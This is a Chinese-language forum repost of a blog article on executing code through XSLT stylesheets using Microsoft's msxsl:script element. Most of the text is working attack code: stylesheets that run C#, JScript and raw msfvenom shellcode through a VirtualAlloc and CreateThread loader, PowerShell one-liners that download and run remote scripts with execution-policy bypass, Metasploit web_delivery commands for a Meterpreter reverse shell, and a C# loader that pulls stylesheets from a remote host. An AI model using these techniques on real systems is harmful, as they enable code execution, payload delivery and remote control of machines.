本帖最後由 KinKALaw 於 2017-7-9 13:11 編輯
作者:Evi1cg's blog
來源: 網絡收集
來源網址:請点擊
簡介 XSLT全稱為拓展樣式表轉換語言,是一種用於將 XML 文檔轉換為 XHTML 文檔或其他 XML 文檔的語言。更多關於XSLT的教程可以參考W3school。關於XSLT的hack技巧之前已經有老師總結了WebShell系列(一)---XML,裡面詳細介紹了怎麼通過xslt構造webshell,並且可以看的出,通過XSLT可以執行很多類型的腳本,前段時間@Casey Smith公開了一個Execute C# From XSLT 的POC,感覺很有趣,所以簡單的研究了一下,也就有了此文。 POCCasey Smith分享的poc如下:
calc.xslt - <font size="3"><xsl:stylesheet version="2.0"
- xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
- xmlns:msxsl="urn:schemas-microsoft-com:xslt"
- xmlns:my="urn:MyModule">
- <msxsl:script implements-prefix="my" language="C#">
- public void Exec()
- {
- System.Diagnostics.Process.Start("Calc.exe");
- }
- </msxsl:script>
- <xsl:template match="data">
- <result>
- <xsl:value-of select="my:Exec()" />
- </result>
- </xsl:template>
- </xsl:stylesheet></font>
複製代碼
其中xsl:stylesheet用來定義樣式表的根項目;version是其必須的屬性,用來規定樣式表的XSLT 版本;xmlns:xsl名稱空間,值固定;要使用msxsl:script元素,由於其屬於命名空間urn:schemas-microsoft-com:xslt,所以樣式表必須包含命名空間聲明;xmlns:my定義命名空間,名字隨意,需要注意的是下面的implements-prefix的值要與其一致。
msxsl:script定義如下: - <msxsl:script language = "language-name" implements-prefix = "prefix of user namespace"> </msxsl:script>
複製代碼其中 msxsl 是綁定到命名空間 urn:schemas-microsoft-com:xslt的首碼。
language 屬性不是強制屬性,但如果指定該屬性,其值必須是下列值之一:C#、VB、JScript、JavaScript、VisualBasic 或 CSharp。 如果未指定,則預設語言為 JScript。
implements-prefix屬性是必選項。 此屬性用於聲明命名空間並將其與腳本塊關聯。 xsl:template元素包含了當匹配指定節點時要應用的規則,match 屬性用於把範本關聯到某個 XML 元素,在這裡關聯了
example.xml,如下: - <font size="3"><msxsl:script language = "language-name" implements-prefix = "prefix of user namespace"> </msxsl:script></font>
複製代碼
xsl:value-of 元素用於提取某個選定節點的值。在這裡也就是執行我們的函數。 執行其POC,可以成功執行C#代碼。
如果想遠程加載執行可以這樣: - powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/Ridter/xslt_poc/master/xslt_exec.ps1'); xslt_exec -xslt_url https://raw.githubusercontent.com/Ridter/xslt_poc/master/calc.xslt"
複製代碼
Exec Shellcode既然能執行C#,那怎麼執行ShellCode呢,其實很簡單,參考Casey Smith給出的代碼,修改代碼如下:
shellcode.xslt - <xsl:stylesheet version="2.0"
- xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
- xmlns:msxsl="urn:schemas-microsoft-com:xslt"
- xmlns:shellcode="urn:MyModule">
- <msxsl:script implements-prefix="shellcode" language="C#">
- <msxsl:using namespace="System.Runtime.InteropServices" />
- <![CDATA[
- private static UInt32 MEM_COMMIT = 0x1000;
- private static UInt32 PAGE_EXECUTE_READWRITE = 0x40;
- [DllImport("kernel32")]
- private static extern UInt32 VirtualAlloc(UInt32 lpStartAddr,UInt32 size, UInt32 flAllocationType, UInt32 flProtect);
- [DllImport("kernel32")]
- private static extern IntPtr CreateThread(
- UInt32 lpThreadAttributes,
- UInt32 dwStackSize,
- UInt32 lpStartAddress,
- IntPtr param,
- UInt32 dwCreationFlags,
- ref UInt32 lpThreadId
- );
- [DllImport("kernel32")]
- private static extern UInt32 WaitForSingleObject(
- IntPtr hHandle,
- UInt32 dwMilliseconds
- );
- public void Exec()
- {
- #msfvenom --payload windows/x64/exec CMD="calc" EXITFUNC=thread -f csharp
- byte[] shellcode = new new byte[272] {
- 0xfc,0x48,0x83,0xe4,0xf0,0xe8,0xc0,0x00,0x00,0x00,0x41,0x51,0x41,0x50,0x52,
- 0x51,0x56,0x48,0x31,0xd2,0x65,0x48,0x8b,0x52,0x60,0x48,0x8b,0x52,0x18,0x48,
- 0x8b,0x52,0x20,0x48,0x8b,0x72,0x50,0x48,0x0f,0xb7,0x4a,0x4a,0x4d,0x31,0xc9,
- 0x48,0x31,0xc0,0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0x41,0xc1,0xc9,0x0d,0x41,
- 0x01,0xc1,0xe2,0xed,0x52,0x41,0x51,0x48,0x8b,0x52,0x20,0x8b,0x42,0x3c,0x48,
- 0x01,0xd0,0x8b,0x80,0x88,0x00,0x00,0x00,0x48,0x85,0xc0,0x74,0x67,0x48,0x01,
- 0xd0,0x50,0x8b,0x48,0x18,0x44,0x8b,0x40,0x20,0x49,0x01,0xd0,0xe3,0x56,0x48,
- 0xff,0xc9,0x41,0x8b,0x34,0x88,0x48,0x01,0xd6,0x4d,0x31,0xc9,0x48,0x31,0xc0,
- 0xac,0x41,0xc1,0xc9,0x0d,0x41,0x01,0xc1,0x38,0xe0,0x75,0xf1,0x4c,0x03,0x4c,
- 0x24,0x08,0x45,0x39,0xd1,0x75,0xd8,0x58,0x44,0x8b,0x40,0x24,0x49,0x01,0xd0,
- 0x66,0x41,0x8b,0x0c,0x48,0x44,0x8b,0x40,0x1c,0x49,0x01,0xd0,0x41,0x8b,0x04,
- 0x88,0x48,0x01,0xd0,0x41,0x58,0x41,0x58,0x5e,0x59,0x5a,0x41,0x58,0x41,0x59,
- 0x41,0x5a,0x48,0x83,0xec,0x20,0x41,0x52,0xff,0xe0,0x58,0x41,0x59,0x5a,0x48,
- 0x8b,0x12,0xe9,0x57,0xff,0xff,0xff,0x5d,0x48,0xba,0x01,0x00,0x00,0x00,0x00,
- 0x00,0x00,0x00,0x48,0x8d,0x8d,0x01,0x01,0x00,0x00,0x41,0xba,0x31,0x8b,0x6f,
- 0x87,0xff,0xd5,0xbb,0xe0,0x1d,0x2a,0x0a,0x41,0xba,0xa6,0x95,0xbd,0x9d,0xff,
- 0xd5,0x48,0x83,0xc4,0x28,0x3c,0x06,0x7c,0x0a,0x80,0xfb,0xe0,0x75,0x05,0xbb,
- 0x47,0x13,0x72,0x6f,0x6a,0x00,0x59,0x41,0x89,0xda,0xff,0xd5,0x63,0x61,0x6c,
- 0x63,0x00 };
-
- UInt32 funcAddr = VirtualAlloc(0, (UInt32)shellcode.Length,MEM_COMMIT, PAGE_EXECUTE_READWRITE);
- Marshal.Copy(shellcode, 0, (IntPtr)(funcAddr), shellcode.Length);
- IntPtr hThread = IntPtr.Zero;
- UInt32 threadId = 0;
- IntPtr pinfo = IntPtr.Zero;
- hThread = CreateThread(0, 0, funcAddr, pinfo, 0, ref threadId);
- WaitForSingleObject(hThread, 0xFFFFFFFF);
- }
- ]]>
- </msxsl:script>
- <xsl:template match="data">
- <result>
- <xsl:value-of select="shellcode:Exec()" />
- </result>
- </xsl:template>
- </xsl:stylesheet>
複製代碼 shellcode可以通過msf來生成,具體生成方法在代碼裡已經給出,測試如下
Exec JScript既然xslt可以執行多種腳本,當然也包括JScript,代碼如下: - <xsl:stylesheet version="1.0"
- xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
- xmlns:msxsl="urn:schemas-microsoft-com:xslt"
- xmlns:user="http://mycompany.com/mynamespace">
- <msxsl:script language="JScript" implements-prefix="user">
- <![CDATA[
- function test(){
- var r = new ActiveXObject("WScript.Shell").Run("calc.exe");
- }
- ]]>
- </msxsl:script>
- <xsl:template match="data">
- <result>
- <xsl:value-of select="user:test()" />
- </result>
- </xsl:template>
- </xsl:stylesheet>
複製代碼遠端載入如下: - powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/Ridter/xslt_poc/master/xslt_exec.ps1'); xslt_exec -xslt_url https://raw.githubusercontent.com/Ridter/xslt_poc/master/js_calc.xslt"
複製代碼 之前Casey Smith分享過一個JS Dropper戳我。裡面多了一個調用certuil.exe對檔進行base64加解密,這裡當然也可以實現,具體代碼就不貼了,位址在這
Get Meterpreter說了這麼多,有人可能會問怎麼才能獲得meterpreter,其實很簡單,實現代碼在這。首先msf開啟監聽: - use exploit/multi/script/web_delivery
- set target 2
- set payload windows/meterpreter/reverse_tcp
- set lhost 192.168.100.101
- set lport 8889
- set uripath xslt
- exploit
複製代碼然後修改meter.xslt,之後用ps來載入就可以了。
Other當然,除了powershell可以調用xslt,其他語言也可以,這裡分享一個C#的,代碼如下: - using System;
- using System.Collections.Generic;
- using System.IO;
- using System.Linq;
- using System.Text;
- using System.Threading.Tasks;
- using System.Xml.XPath;
- using System.Xml.Xsl;
- using System.Xml;
- namespace ApplyXSLTToXML
- {
- class Program
- {
- static void Main(string[] args)
- {
- string XMLFilePath = @"http://evi1cg.me/scripts/example.xml";
- string XSLTFilePath = @"http://evi1cg.me/scripts/calc.xslt";
- try
- {
- XsltSettings xslt_settings = new XsltSettings(false, true);
- xslt_settings.EnableScript = true;
- XslCompiledTransform xslt = new XslCompiledTransform();
- XmlUrlResolver resolver = new XmlUrlResolver();
- // Load documents
- xslt.Load(XSLTFilePath, xslt_settings, resolver);
- XPathDocument xmlPathDoc = new XPathDocument(XMLFilePath);
- XmlWriterSettings settings = new XmlWriterSettings();
- settings.Indent = true;
- settings.OmitXmlDeclaration = true;
- XmlWriter writer = XmlWriter.Create("output.xml", settings);
- xslt.Transform(xmlPathDoc,writer);
- writer.Close();
- }
- catch (Exception e)
- {
- Console.WriteLine("Error:");
- Console.WriteLine(e.Message);
- }
- }
- }
- }
複製代碼其他語言的,如果需要,還希望小夥伴們自己動手寫寫。
|